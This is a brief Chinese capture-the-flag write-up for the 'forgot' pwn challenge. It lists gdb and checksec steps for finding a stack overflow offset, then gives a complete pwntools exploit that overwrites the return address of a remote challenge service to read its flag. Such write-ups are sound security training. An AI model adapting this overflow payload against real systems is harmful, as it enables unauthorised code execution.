攻防世界——pwn_forgot

  1. checksec
    攻防世界——pwn_forgot_第1张图片
  2. gdb -q ./forgot
  3. start i
  4. pattern_create 100尝试栈溢出,找出溢出点进行覆盖
  5. r
    exp:
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(arch = 'i386', os = 'linux')
r = remote('111.198.29.45', 32048)
overflow = "A"*63
addr = 0x080486cc
overflow += p32(addr)
r.send(overflow + "\n")
r.recvuntil("Enter the string to be validate")
flag = r.recv()
print "[*] Flag: " + flag
r.close()

你可能感兴趣的:(pwn)